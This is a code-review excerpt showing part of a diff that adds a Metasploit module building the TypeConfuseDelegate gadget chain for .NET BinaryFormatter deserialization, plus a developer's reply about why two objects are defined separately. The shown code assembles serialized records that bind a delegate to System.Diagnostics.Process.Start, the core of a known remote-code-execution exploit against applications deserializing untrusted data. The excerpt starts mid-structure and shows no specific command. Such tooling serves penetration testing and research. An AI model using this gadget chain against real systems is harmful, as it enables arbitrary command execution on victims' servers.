lib/msf/util/dot_net_deserialization/gadget_chains/type_confuse_delegate.rb

```diff
@@ -0,0 +1,207 @@
+            obj_id: 11,
+            string: 'System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]'
+          )),
+          Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(
+            obj_id: 12,
+            string: 'mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
+          )),
+          Types::Record.from_value(Types::RecordValues::ObjectNull.new),
+          Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(
+            obj_id: 13,
+            string: 'System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
+          )),
+          Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(
+            obj_id: 14,
+            string: 'System.Diagnostics.Process'
+          )),
+          Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(
+            obj_id: 15,
+            string: 'Start'
+          )),
+          Types::Record.from_value(Types::RecordValues::MemberReference.new(id_ref: 16))
+        ]
+      )
+
+      obj_id_9 = Types::RecordValues::SystemClassWithMembersAndTypes.from_member_values(
+        class_info: Types::General::ClassInfo.new(
+          obj_id: 9,
+          name: 'System.Reflection.MemberInfoSerializationHolder',
+          member_names: %w{ Name AssemblyName ClassName Signature Signature2 MemberType GenericArguments }
+        ),
+        member_type_info: Types::General::MemberTypeInfo.new(
+          binary_type_enums: %i{ String String String String String Primitive SystemClass },
+          additional_infos: [
+            Enums::PrimitiveTypeEnum.fetch(:Int32),
+            'System.Type[]'
+          ]
+        ),
+        member_values: [
+          Types::Record.from_value(Types::RecordValues::MemberReference.new(id_ref: 15)),
+          Types::Record.from_value(Types::RecordValues::MemberReference.new(id_ref: 13)),
+          Types::Record.from_value(Types::RecordValues::MemberReference.new(id_ref: 14)),
+          Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(
+            obj_id: 20,
+            string: 'System.Diagnostics.Process Start(System.String, System.String)'
+          )),
+          Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(
+            obj_id: 21,
+            string: 'System.Diagnostics.Process Start(System.String, System.String)'
+          )),
+          8,
+          Types::Record.from_value(Types::RecordValues::ObjectNull.new)
+        ]
+      )
+
+      self.from_values([
+        Types::RecordValues::SerializationHeaderRecord.new(root_id: 1, header_id: -1),
+        library,
+        Types::RecordValues::ClassWithMembersAndTypes.from_member_values(
```

Comment:
If you think that makes it more readable, I'd be happy to. The reason why those two are defined outside though isn't for readability but rather because they're referred to by other objects (towards the end of the chain).